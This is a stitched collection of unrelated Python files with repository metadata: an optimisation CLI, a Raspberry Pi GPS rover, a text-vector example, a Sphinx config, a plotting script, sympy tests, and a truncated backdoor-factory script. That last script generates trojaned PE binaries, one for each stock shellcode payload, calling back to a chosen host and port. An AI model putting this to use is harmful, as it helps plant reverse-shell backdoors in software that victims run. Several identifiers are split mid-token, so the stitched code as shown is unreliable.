parser = argparse.ArgumentParser(description='This script optimizes bayesian network graph structure by MOABC')
#強化成功率表
parser.add_argument("infile_pt", type=str)
#一回の強化費用
parser.add_argument("-pg","--pricegrind", type=int)
#強化シミュレータの実行回数
parser.add_argument("-na","--num_average", type=int, default=100)
#結果の出力先
# 最後のスラッシュいらない
# OK: test, ./test
# NG: test/, ./test/
parser.add_argument("out_dir", type=str)
#学習中の結果の保存
group_sp = parser.add_mutually_exclusive_group()
group_sp.add_argument('-sp', '--saveprogress', action='store_true')
group_sp.add_argument('-n-sp', '--no-saveprogress', action='store_false')
parser.set_defaults(saveprogress=False)
#並列化のプロセス数
parser.add_argument("-np","--num_proc", type=int, default=1)
#画像出力の有無
# sshログインとかだと無理なので、Falseを入れる
group_wi = parser.add_mutually_exclusive_group()
group_wi.add_argument('-wi', '--withimage', action='store_true')
group_wi.add_argument('-n-wi', '--no-with_image', action='store_false')
parser.set_defaults(withimage=True)
#蜂の数
parser.add_argument('-me', '--m_employed', type=int, help='収穫蜂の数', default=40)
parser.add_argument('-mo', '--m_onlooker',type=int, help='追従蜂の数', default=40)
parser.add_argument('-li', '--limit',type=int, help='偵察蜂の閾値', default=3)
#ループ数
parser.add_argument('-n', type=int, help='ループ数', default=50)
#ALPHA
parser.add_argument('-a', '--alpha', type=float, help='ALPHAの値', default=1)
#変数のparse
# 下のやり方でdictになるっぽい
args = vars(parser.parse_args())
print("parsed argments from argparse\n%s\n" % str(args))
#出力先ディレクトリ
out_dir = args['out_dir']
#実行中の結果保存
save_progress = args['saveprogress']
#インスタンスの作成
infile_pt = args['infile_pt']
input_price_grind = args['pricegrind']
op = optimizer.MOABC(infile_pt, input_price_grind)
#ハイパーパラメータの設定
op.M_employed = args['m_employed']
op.M_onlooker = args['m_onlooker']
op.LIMIT = args['limit']
op.N = arg
|
s['n']
op.weight_h = args['alpha']
op.proc = args['num_proc']
op.num_average = args['num_average']
#パラメータを適用
op.gen.calculate_weights()
#学習の処理
d
|
ir_save_progress = ''
if save_progress:
dir_save_progress = out_dir
start = time.time()
op.learn(out_dirname=dir_save_progress)
end = time.time()
#経過時間の出力
str_time = "time: ", "{0}".format(end - start)
print(str_time)
f = open('%s/time.log' % out_dir, 'w')
f.writelines(str_time)
f.close()
#学習結果の出力
op.save_result(out_dir, prefix='total', with_image=args['withimage'])
|
klinstifen/rpi.mar13
|
mar13.py
|
Python
|
lgpl-3.0
| 6,451
| 0.014106
|
#!/usr/bin/python
import serial
import RPi.GPIO as GPIO
import time
import math
from RPIO import PWM
import logging
from math import *
from hmc5883l import hmc5883l
import sys
import os
# -----------------------------------------
# ----- begin declare variables
# -----------------------------------------
# log filename
logfile = 'log.csv'
# waypoint filename
wpfile = "waypoints.txt"
# GPS serial port
serialport = serial.Serial("/dev/gps0", 115200)
# xbee serial port
#xbee = serial.Serial("/dev/gps0", 9600)
# compass adjustment
cAdjust = +2
# GPIO pins
goButton = 17
readyLED = 18
steering = 24
#throttle = 23
# GPS accuracy * 2
GPSaccuracy = 10
# -----------------------------------------
# ----- end declare variables
# -----------------------------------------
GPIO.setmode(GPIO.BCM)
GPIO.setup(readyLED,GPIO.OUT)
GPIO.setup(goButton,GPIO.IN)
# setup compass
#mydec = -13,25
compass = hmc5883l(gauss = 4.7, declination = (-7,13))
# read in waypoints
wps = []
wplist = open(wpfile,'r')
for line in wplist:
coord = line.split(",")
wps.append([float(coord[0]),float(coord[1])])
wplist.close()
# open logfile
f = open(logfile,'a')
# init steering / throttle
servo = PWM.Servo(pulse_incr_us=1)
servo.set_servo(steering,1500)
#servo.set_servo(throttle,1500)
def blinkLED(n):
# blink LED on/off n number of times
# LED is on/off for 0.5/0.2 seconds
i = 0
while i <= n:
GPIO.output(readyLED,1)
time.sleep(0.5)
GPIO.output(readyLED,0)
time.sleep(0.2)
i += 1
def getDegrees(dms,nw):
# convert GPS in dddmm.mmmm format to dd.dddd
if (int(dms[0:1]) != 0):
dms = str(0) + dms
D = int(dms[0:3])
M = float(dms[3:])
#S = float(dms[5:])
DD = D + float(M)/60 #+ float(S)/3600
if (nw == "S" or nw == "W"): DD *= -1
return float(DD)
def getLocation():
# read serial port and parse out GPS lat/long/compass/heading info
# return a list of found values
GPS = [0, 1, 2, 3, 4]
GPSFound = 0
while not GPSFound:
NMEAline = serialport.readline()
NMEAdata = NMEAline.spl
|
it(',')
if (NMEAdata[0] == "$GPRMC"):
# make sure we have GPS lock
if NMEAdata[2] == "V": continue
GPS[0] = round(getDegrees(NMEAdata[3],NMEAdata[4]),6) # lat
GPS[1] = NMEAdata[4] # n/s
GPS[2] = round(getDegrees(NMEAdata[5],NMEAdata[6]),6) # long
GPS[3]
|
= NMEAdata[6] # e/w
GPS[4] = NMEAdata[8] # heading
GPSFound = 1
return GPS
def getBearing(lat1, long1, lat2, long2):
long1, lat1, long2, lat2 = map(radians, [long1, lat1, long2, lat2])
dLon = long2 - long1
y = sin(dLon) * cos(lat2)
x = cos(lat1) * sin(lat2) \
- sin(lat1) * cos(lat2) * cos(dLon)
b = round(degrees(atan2(y, x)))
b = b + 360 if b < 0 else b
return b
def getDistance(lat1, long1, lat2, long2):
lat1, long1, lat2, long2 = map(radians, [lat1, long1, lat2, long2])
dlon = long2 - long1
dlat = lat2 - lat1
a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2
c = 2 * asin(sqrt(a))
d = 3961 * c
d = round(d * 5280,6) # convert distance to feet
print ('Distance: ' + str(d))
return d
def changeDirection(course):
# change rc steering to match course angle
steerAng = (round(course / 3.5) * 50) + 1500
servo.set_servo(steering,steerAng)
def main():
GPIO.output(readyLED,1)
while True:
if (GPIO.input(goButton)):
# get ready
blinkLED(3)
# go
#servo.set_servo(throttle,1600)
# time of run
tor = str(time.strftime("%d%m%Y")) + str(time.strftime("%H%M%S"))
# set loop count
n = 0
for wp in wps:
wpLat = wp[0]
wpLong = wp[1]
distance = GPSaccuracy
while distance >= GPSaccuracy:
start = int(round(time.time() * 1000))
GPS = getLocation()
myLat = GPS[0]
myLong = GPS[2]
bearing = getBearing(myLat,myLong,wpLat,wpLong)
heading = compass.heading() + cAdjust
course = bearing - heading
while course > 0:
if (course >= 180):
course -= 360
if (course <= -180):
course +=360
# correct for max turn capability
if (course > 35):
course = 35
if (course < -35):
course = -35
changeDirection(course)
heading = compass.heading() + cAdjust
course = bearing - heading
# -----------------------
# ---- output to log
# -----------------------
end = int(round(time.time() * 1000))
lduration = (end - start)
# -----------------------
# --- output to xbee
# -----------------------
output = str(n) + ' || ' + str(myLat) + ' || ' + str(myLong) + ' || ' + \
str(wp) + ' || ' + str(bearing) + ' || ' + str(distance) + ' || ' + \
str(heading) + ' || ' + str(course) + ' || ' + str(lduration) + '\r'
#xbee.write(output)
# ---- header
# tor,loop,lat,long,waypoint,bearing,distance,heading,course,loop duration
output = str(tor), str(n) + ',' + str(myLat) + ',' + str(myLong) + ',' + \
str(wp) + ',' + str(bearing) + ',' + str(distance) + ',' + \
str(heading) + ',' + str(course) + ',' + str(lduration) + '\n'
f.write(output)
n += 1
distance = getDistance(myLat,myLong,wpLat,wpLong)
f.close()
# stop
#servo.set_servo(throttle,1500)
if __name__=="__main__":
main()
|
krishna11888/ai
|
third_party/pattern/examples/05-vector/01-document.py
|
Python
|
gpl-2.0
| 3,205
| 0.007488
|
import os, sys; sys.path.insert(0, os.path.join(os.path.dirname(__file__), "..", ".."))
import codecs
from pattern.vector import Document, PORTER, LEMMA
# A Document is a "bag-of-words" that splits a string into words and counts them.
# A list of words or dictionary of (word, count)-items can also be given.
# Words (or more generally "features") and their word count ("feature weights")
#
|
can be used to compare docu
|
ments. The word count in a document is normalized
# between 0.0-1.0 so that shorted documents can be compared to longer documents.
# Words can be stemmed or lemmatized before counting them.
# The purpose of stemming is to bring variant forms a word together.
# For example, "conspiracy" and "conspired" are both stemmed to "conspir".
# Nowadays, lemmatization is usually preferred over stemming,
# e.g., "conspiracies" => "conspiracy", "conspired" => "conspire".
s = """
The shuttle Discovery, already delayed three times by technical problems and bad weather,
was grounded again Friday, this time by a potentially dangerous gaseous hydrogen leak
in a vent line attached to the ship's external tank.
The Discovery was initially scheduled to make its 39th and final flight last Monday,
bearing fresh supplies and an intelligent robot for the International Space Station.
But complications delayed the flight from Monday to Friday,
when the hydrogen leak led NASA to conclude that the shuttle would not be ready to launch
before its flight window closed this Monday.
"""
# With threshold=1, only words that occur more than once are counted.
# With stopwords=False, words like "the", "and", "I", "is" are ignored.
document = Document(s, threshold=1, stopwords=False)
print document.words
print
# The /corpus folder contains texts mined from Wikipedia.
# Below is the mining script (we already executed it for you):
#import os, codecs
#from pattern.web import Wikipedia
#
#w = Wikipedia()
#for q in (
# "badger", "bear", "dog", "dolphin", "lion", "parakeet",
# "rabbit", "shark", "sparrow", "tiger", "wolf"):
# s = w.search(q, cached=True)
# s = s.plaintext()
# print os.path.join("corpus2", q+".txt")
# f = codecs.open(os.path.join("corpus2", q+".txt"), "w", encoding="utf-8")
# f.write(s)
# f.close()
# Loading a document from a text file:
f = os.path.join(os.path.dirname(__file__), "corpus", "wolf.txt")
s = codecs.open(f, encoding="utf-8").read()
document = Document(s, name="wolf", stemmer=PORTER)
print document
print document.keywords(top=10) # (weight, feature)-items.
print
# Same document, using lemmatization instead of stemming (slower):
document = Document(s, name="wolf", stemmer=LEMMA)
print document
print document.keywords(top=10)
print
# In summary, a document is a bag-of-words representation of a text.
# Bag-of-words means that the word order is discarded.
# The dictionary of words (features) and their normalized word count (weights)
# is also called the document vector:
document = Document("a black cat and a white cat", stopwords=True)
print document.words
print document.vector.features
for feature, weight in document.vector.items():
print feature, weight
# Document vectors can be bundled into a Model (next example).
|
redvox/Eliza
|
docs/conf.py
|
Python
|
apache-2.0
| 9,460
| 0.006237
|
# -*- coding: utf-8 -*-
#
# Core documentation build configuration file, created by
# sphinx-quickstart on Mon Oct 12 12:49:48 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinxcontrib.autohttp.flask'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Eliza'
copyright = u'2016, Jens Schaa'
author = u'Jens Schaa'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
sys.path.insert(0, os.path.abspath('../'))
sys.path.insert(0, os.path.abspath('../eliza'))
import version
version = '.'.join(str(x) for x in version.__version__)
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
# html_theme = 'alabaster'
import sphinx_rtd_theme
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name
|
of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = No
|
ne
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'Coredoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'Eliza.tex', u'Eliza Documentation',
u'Jens Schaa', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL address
|
ekaakurniawan/Bioinformatics-Tools
|
plot_conservation/plot_conservation.py
|
Python
|
gpl-2.0
| 2,539
| 0.002363
|
# Copyright (C) 2012 by Eka A. Kurniawan
# eka.a.kurniawan(ta)gmail(tod)com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; version 2 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the
# Free Software Foundation, Inc.,
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# Tested on:
# - Python 2.7.3
# - NumPy 1.6.2
# - MatPlotLib 1.1.1
import numpy as np
import matplotlib.pyplot as plot
files = [['H1N1 - Avian - protein_conservation.txt', 'H1N1 - Avian'],
['H1N1 - Human - protein 1a_conservation.txt', 'H1N1 - Human 1'],
['H1N1 - Human - protein 1b_conservation.txt', 'H1N1 - Human 2'],
['H1N1 - Human - protein 2a_conservation.txt', 'H1N1 - Human 3'],
['H1N1 - Human - protein 2b_conservation.txt', 'H1N1 - Human 4'],
['H1N1 - Human - protein 3a_conservation.txt', 'H1N1 - Human 5'],
['H1N1 - Human - protein 3b_conservation.txt', 'H1N1 - Human 6'],
['H1N1 - Swine - protein_conservation.txt', 'H1N1 - Swine'],
['H3N2 - Avian - protein_conservation.txt', 'H3N2 - Avian'],
['H3N2 - Human - protein 1_conservation.txt', 'H3N2 - Human 1'],
['H3N2 - Human - protein 2_conservation.txt', 'H3N2 - Human 2'],
['H3N2 - Human - protein 3_conservation.txt', 'H3N2 - Human 3'],
['H3N2 - Swine - protein_conservation.txt', 'H3N2 - Swine'],
['H5N1 - Avian - protein_conservation.txt', 'H5N1 - Avian'],
['H5N1 - Human - protein_conservation.txt', 'H5N1 - Human'],
['H5N1 - Swine - protein_conservation.txt', 'H5N1 - Swine
|
']]
conservations = []
totalFile = len(files)
for file in
|
files:
inFile = open(file[0], 'r')
conservations.append(np.array(inFile.read().split(',')[:-1], \
dtype = np.float))
inFile.close()
plot.boxplot([np.asarray(cs) for cs in conservations])
plot.title('Conservation Box Plot of Different Viruses')
plot.ylabel('Score (0 to 11)')
plot.xticks(np.arange(totalFile + 1), [''] + [file[1] for file in files], \
rotation = -90)
plot.show()
|
pernici/sympy
|
sympy/solvers/tests/test_solvers.py
|
Python
|
bsd-3-clause
| 13,913
| 0.016172
|
from sympy import (Matrix, Symbol, solve, exp, log, cos, acos, Rational, Eq,
sqrt, oo, LambertW, pi, I, sin, asin, Function, diff, Derivative, symbols,
S, sympify, var, simplify, Integral, sstr, Wild, solve_linear, Interval,
And, Or, Lt, Gt, Assume, Q, re, im, expand, zoo)
from sympy.solvers import solve_linear_system, solve_linear_system_LU,dsolve,\
tsolve, solve_undetermined_coeffs
from sympy.solvers.solvers import guess_solve_strategy, GS_POLY, GS_POLY_CV_1, GS_POLY_CV_2,\
GS_TRANSCENDENTAL, GS_RATIONAL, GS_RATIONAL_CV_1
from sympy.utilities.pytest import XFAIL, raises
from sympy.abc import x
def NS(e, n=15, **options):
return sstr(sympify(e).evalf(n, **options), full_prec=True)
def test_swap_back():
# A solution comes back from solve even though it shouldn't be: f(x) is
# in the solution's Integral as the upper limit. When solve is fixed this
# test should be removed. For now, since there are ode's that come back
# with these sorts of solutions, the swap_back feature is performed in
# solve and tested here.
# This appears to be fixed - the equation is not solved.
x = Symbol('x')
f = Function('f')
raises(NotImplementedError, "solve(Eq(log(f(x)), Integral(x, (x, 1, f(x)))), f(x))")
def test_guess_poly():
"""
See solvers.guess_solve_strategy
"""
x, y, a = symbols('x,y,a')
# polynomial equations
assert guess_solve_strategy( S(4), x ) == GS_POLY
assert guess_solve_strategy( x, x ) == GS_POLY
assert guess_solve_strategy( x + a, x ) == GS_POLY
assert guess_solve_strategy( 2*x, x ) == GS_POLY
assert guess_solve_strategy( x + sqrt(2), x) == GS_POLY
assert guess_solve_strategy( x + 2**Rational(1,4), x) == GS_POLY
assert guess_solve_strategy( x**2 + 1, x ) == GS_POLY
assert guess_solve_strategy( x**2 - 1, x ) == GS_POLY
assert guess_solve_strategy( x*y + y, x ) == GS_POLY
assert guess_solve_strategy( x*exp(y) + y, x) == GS_POLY
assert guess_solve_strategy( (x - y**3)/(y**2*(1 - y**2)**(S(1)/2)), x) == GS_POLY
def test_guess_poly_cv():
x, y = symbols('x,y')
# polynomial equations via a change of variable
assert guess_solve_strategy( x**Rational(1,2) + 1, x ) == GS_POLY_CV_1
assert guess_solve_strategy( x**Rational(1,3) + x**Rational(1,2) + 1, x ) == GS_POLY_CV_1
assert guess_solve_strategy( 4*x*(1 - sqrt(x)), x ) == GS_POLY_CV_1
# polynomial equation multiplying both sides by x**n
assert guess_solve_strategy( x + 1/x + y, x ) == GS_POLY_CV_2
def test_guess_rational_cv():
# rational functions
x, y = symbols('x,y')
assert guess_solve_strategy( (x+1)/(x**2 + 2), x) == GS_RATIONAL
assert guess_solve_strategy( (x - y**3)/(y**2*(1 - y**2)**(S(1)/2)), y) == GS_RATIONAL_CV_1
# rational functions via the change of variable y -> x**n
assert guess_solve_strategy( (x**Rational(1,2) + 1)/(x**Rational(1,3) + x**Rational(1,2) + 1), x ) \
== GS_RA
|
TIONAL_CV_1
def test_guess_transcendental():
x, y, a, b = symbols('x,y,a,b')
#transcendental functions
assert guess_solve_strategy( exp(x) + 1, x ) == GS_TRANSCENDENTAL
assert guess_solve_strategy( 2*cos(x)-y, x ) == GS_TRANSCENDENTAL
assert guess_solve_strategy( exp(x) + exp(-x) - y, x ) == GS_TRANSCENDENTAL
assert guess_solve_strategy(3**x-10, x) == GS_TRANSCENDENTAL
assert guess_solve_strategy(-3**x+10, x) == GS_TRANSCENDENTAL
assert guess_solv
|
e_strategy(a*x**b-y, x) == GS_TRANSCENDENTAL
def test_solve_args():
x, y = symbols('x,y')
#implicit symbol to solve for
assert set(int(tmp) for tmp in solve(x**2-4)) == set([2,-2])
assert solve([x+y-3,x-y-5]) == {x: 4, y: -1}
#no symbol to solve for
assert solve(42) == []
assert solve([1,2]) == None
#multiple symbols
assert solve(x+y-3,[x,y]) == {x: [3 - y], y: [3 - x]}
#symbol is not a symbol or function
raises(TypeError, "solve(x**2-pi, pi)")
def test_solve_polynomial1():
x, y, a = symbols('x,y,a')
assert solve(3*x-2, x) == [Rational(2,3)]
assert solve(Eq(3*x, 2), x) == [Rational(2,3)]
assert solve(x**2-1, x) in [[-1, 1], [1, -1]]
assert solve(Eq(x**2, 1), x) in [[-1, 1], [1, -1]]
assert solve( x - y**3, x) == [y**3]
assert sorted(solve( x - y**3, y)) == sorted([
(-x**Rational(1,3))/2 + I*sqrt(3)*x**Rational(1,3)/2,
x**Rational(1,3),
(-x**Rational(1,3))/2 - I*sqrt(3)*x**Rational(1,3)/2,
])
a11,a12,a21,a22,b1,b2 = symbols('a11,a12,a21,a22,b1,b2')
assert solve([a11*x + a12*y - b1, a21*x + a22*y - b2], x, y) == \
{ y : (a11*b2 - a21*b1)/(a11*a22 - a12*a21),
x : (a22*b1 - a12*b2)/(a11*a22 - a12*a21) }
solution = {y: S.Zero, x: S.Zero}
assert solve((x-y, x+y), x, y ) == solution
assert solve((x-y, x+y), (x, y)) == solution
assert solve((x-y, x+y), [x, y]) == solution
assert solve( x**3 - 15*x - 4, x) == [-2 + 3**Rational(1,2),
4,
-2 - 3**Rational(1,2) ]
assert sorted(solve((x**2 - 1)**2 - a, x)) == \
sorted([(1 + a**S.Half)**S.Half, -(1 + a**S.Half)**S.Half,
(1 - a**S.Half)**S.Half, -(1 - a**S.Half)**S.Half])
def test_solve_polynomial2():
x = Symbol('x')
assert solve(4, x) == []
def test_solve_polynomial_cv_1a():
"""
Test for solving on equations that can be converted to a polynomial equation
using the change of variable y -> x**Rational(p, q)
"""
x = Symbol('x')
assert solve( x**Rational(1,2) - 1, x) == [1]
assert solve( x**Rational(1,2) - 2, x) == [4]
assert solve( x**Rational(1,4) - 2, x) == [16]
assert solve( x**Rational(1,3) - 3, x) == [27]
ans = solve(x**Rational(1,2)+x**Rational(1,3)+x**Rational(1,4),x)
assert set([NS(w, n=2) for w in ans]) == \
set(['0.010', '-9.5 + 2.8*I', '0', '-9.5 - 2.8*I'])
def test_solve_polynomial_cv_1b():
x, a = symbols('x a')
assert set(solve(4*x*(1 - a*x**(S(1)/2)), x)) == set([S(0), 1/a**2])
assert set(solve(x * (x**(S(1)/3) - 3), x)) == set([S(0), S(27)])
def test_solve_polynomial_cv_2():
"""
Test for solving on equations that can be converted to a polynomial equation
multiplying both sides of the equation by x**m
"""
x = Symbol('x')
assert solve(x + 1/x - 1, x) in \
[[ Rational(1,2) + I*sqrt(3)/2, Rational(1,2) - I*sqrt(3)/2],
[ Rational(1,2) - I*sqrt(3)/2, Rational(1,2) + I*sqrt(3)/2]]
def test_solve_rational():
"""Test solve for rational functions"""
x, y, a, b = symbols('x,y,a,b')
assert solve( ( x - y**3 )/( (y**2)*sqrt(1 - y**2) ), x) == [y**3]
def test_linear_system():
x, y, z, t, n = symbols('x,y,z,t,n')
assert solve([x-1, x-y, x-2*y, y-1], [x,y]) is None
assert solve([x-1, x-y, x-2*y, x-1], [x,y]) is None
assert solve([x-1, x-1, x-y, x-2*y], [x,y]) is None
assert solve([x+5*y-2, -3*x+6*y-15], x, y) == {x: -3, y: 1}
M = Matrix([[0,0,n*(n+1),(n+1)**2,0],
[n+1,n+1,-2*n-1,-(n+1),0],
[-1, 0, 1, 0, 0]])
assert solve_linear_system(M, x, y, z, t) == \
{y: 0, z: -t*(1 + n)/n, x: -t*(1 + n)/n}
def test_linear_systemLU():
x, y, z, n = symbols('x,y,z,n')
M = Matrix([[1,2,0,1],[1,3,2*n,1],[4,-1,n**2,1]])
assert solve_linear_system_LU(M, [x,y,z]) == {z: -3/(n**2+18*n),
x: 1-12*n/(n**2+18*n),
y: 6*n/(n**2+18*n)}
# Note: multiple solutions exist for some of these equations, so the tests
# should be expected to break if the implementation of the solver changes
# in such a way that a different branch is chosen
def test_tsolve():
a, b = symbols('a,b')
x, y, z = symbols('x,y,z')
assert solve(exp(x)-3, x) == [log(3)]
assert solve((a*x+b)*(exp(x)-3), x) == [-b/a, log(3)]
assert solve(cos(x)-y, x) == [acos(y)]
assert solve(2*cos(x)-y,x)== [acos(y/2)]
raises(NotImplementedError, "solve(Eq(cos(x), sin(x)), x)")
# XXX in the following test, log(2*y + 2*...) should -> log(2
|
shadghost/Auto-Backdoor
|
the-backdoor-factory/payloadtests.py
|
Python
|
gpl-3.0
| 6,022
| 0.001993
|
#!/usr/bin/env python
'''
Copyright (c) 2013-2015, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
import pebin
import machobin
import elfbin
import sys
import os
def basicDiscovery(FILE):
macho_supported = ['\xcf\xfa\xed
|
\xfe', '\xca\xfe\xba\xbe',
'\xce\xfa\xed\xfe',
]
testBinary = open(FILE, 'rb')
header = testBinary.read(4)
testBinary.close()
if 'MZ' in header:
return 'PE'
elif 'E
|
LF' in header:
return 'ELF'
elif header in macho_supported:
return "MACHO"
else:
'Only support ELF, PE, and MACH-O file formats'
return None
if __name__ == "__main__":
'''
Will create patched binaries for each payload for the type of binary provided.
Each payload has it's own port number.
Usage: ./payloadtests.py file 127.0.0.1 8080
'''
if len(sys.argv) != 4:
print "Will create patched binaries for each stock shellcode/payload for the "
print "type of binary provided. Each payload type has it's own port number."
print "Usage:" + str(sys.argv[0]) + " binary HOST PORT"
sys.exit()
file = sys.argv[1]
host = sys.argv[2]
port = int(sys.argv[3])
outputfiles = {}
is_supported = basicDiscovery(file)
if is_supported is "PE":
patchtypes = ['APPEND', 'JUMP', 'SINGLE']
supported_file = pebin.pebin(FILE=file, OUTPUT=None, SHELL='none')
supported_file.run_this()
#print supported_file.flItms['avail_shells']
for aShell in supported_file.flItms['avail_shells']:
for patchtype in patchtypes:
if 'cave_miner' in aShell or 'user_supplied' in aShell:
continue
aName = aShell + "." + patchtype + "." + str(host) + "." + str(port) + "." + file
print "Creating File:", aName
if patchtype == 'APPEND':
supported_file = pebin.pebin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port, ADD_SECTION=True)
elif patchtype == 'JUMP':
supported_file = pebin.pebin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port, CAVE_JUMPING=True)
elif patchtype == 'SINGLE':
supported_file = pebin.pebin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
